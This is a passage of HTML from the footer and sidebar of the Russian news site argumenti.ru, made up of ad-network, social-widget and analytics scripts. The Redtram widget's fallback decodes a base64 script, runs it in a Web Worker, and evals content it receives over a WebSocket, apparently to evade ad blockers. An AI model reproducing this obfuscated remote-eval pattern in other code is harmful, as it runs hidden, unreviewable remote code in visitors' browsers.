 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>



<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<!-- R-50615-1 Яндекс.RTB-блок  -->
<div id="yandex_ad_R-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-50615-1",
                renderTo: "yandex_ad_R-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>



		
		
		
		<!---->
			
			


		<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/unknown/2018/01/560433?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/9a871418c74118f18e8370bf22092bfe.jpg" alt="СМИ: московские войска ПВО привели в боевую готовность из-за НЛО" /></a>
						<a href="http://argumenti.ru/unknown/2018/01/560433?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">СМИ: московские войска ПВО привели в боевую готовность из-за НЛО</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2015/04/395171?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/9227626c7e8f5d0b59c97fbbd1d1bb71.jpg" alt="«Немцов и до смерти плодил ненависть и разногласия в стране!»

 " /></a>
						<a href="http://argumenti.ru/live/2015/04/395171?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">«Немцов и до смерти плодил ненависть и разногласия в стране!»

 </a>
		</li>
			<li>
							<a href="http://argumenti.ru/politics/2018/01/560345?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/b6e72de5ec43c7c15812e387e29c8da9.jpg" alt="Византийские тайны русского телевизора" /></a>
						<a href="http://argumenti.ru/politics/2018/01/560345?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Византийские тайны русского телевизора</a>
		</li>
	</ul>
		
								


<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- Composite Start -->
<div id="M256303ScriptRootC648515">
        <div id="M256303PreloadC648515">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M256303ScriptRootC648515")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M256303ScriptRootC648515");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=648515;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.lentainform.com/a/r/argumenti.ru.648515.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->		
		
			
			
		
<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>			
					

		
		
		
<div class="tabs">
    <h4 class="namerub"><span class="rem">//</span>Мы в соцсетях</h4>

        <input id="tab1" class="socialtabs" type="radio" name="tabs" checked>
        <label class="sociallabels vk" for="tab1" title="Wordpress"></label>
    
        <input id="tab2" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels fb" for="tab2" title="Windows"></label>
    
        <input id="tab3" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels ok" for="tab3" title="HTML5"></label>
    
        <section id="content1" class="tab-content">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?115"></script>

<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
VK.Widgets.Group("vk_groups", {mode: 0, width: "240", height: "300", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 14409962);
</script>

       </section>  
       <section id="content2" class="tab-content">
		<div id="fb-root"></div>
			<script>(function(d, s, id) {
		  var js, fjs = d.getElementsByTagName(s)[0];
		  if (d.getElementById(id)) return;
		  js = d.createElement(s); js.id = id;
		  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
		  fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));</script>

		<div class="fb-like-box" data-href="http://www.facebook.com/argumentinedeli" data-width="240" data-height="303" data-show-faces="true" data-stream="false" data-border-color="b1bad0" data-header="true" data-rel="nofollow"></div>
        </section> 
        <section id="content3" class="tab-content">
		<div id="ok_group_widget"></div>
		<script>
		!function (d, id, did, st) {
		var js = d.createElement("script");
		js.src = "http://connect.ok.ru/connect.js";
		js.onload = js.onreadystatechange = function () {
		if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
		if (!this.executed) {
		this.executed = true;
		setTimeout(function () {
		OK.CONNECT.insertGroupWidget(id,did,st);
		}, 0);
		}
		}}
		d.documentElement.appendChild(js);
		}(document,"ok_group_widget","54308951490571","{width:240,height:335}");
		</script>
        </section>   

   </div>



	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		<div id="block__fix-adv_r">
		<div id="gnezdo_ru_15140">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/15140/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
		
	</div>

	</div>		<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
													</div>
</div>
			<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Политика</a></li>
			<li><a href="http://argumenti.ru/economics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Экономика</a></li>
			<li><a href="http://argumenti.ru/society?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Общество</a></li>
			<li><a href="http://argumenti.ru/world?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Спорт</a></li>
			<li><a href="http://argumenti.ru/rassledovanie?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Расследования</a></li>
			<li><a href="http://argumenti.ru/tourism?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
		</ul>
</div></div>
	
	

<div class="footer_line">



	<div id="logo_footer">
		<!--noindex-->
	«Аргументы недели. Южный Урал». Св-во регионального СМИ – ПИ № ФС 77- 63382 от 16.10.2015
		<div id="endline">
		<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
     </div>

	</div>

<!--noindex-->

	<div id="copy">
		<ul id="footer_menu">
			<li>Ваш город: /</li>
			<li><a href="http://argumenti.ru/reklama/internet.html" rel="nofollow">РЕКЛАМА</a> +7 (495) 981-68-36</li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p><a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></p>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>



<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>

            
<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>




<!--<script type="text/javascript" src="http://an.yandex.ru/system/context.js"></script>-->


<!--// Rating@Mail.ru logo-->

<!--<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=631008" type="text/javascript"></script>


</script>-->
</body>
</html>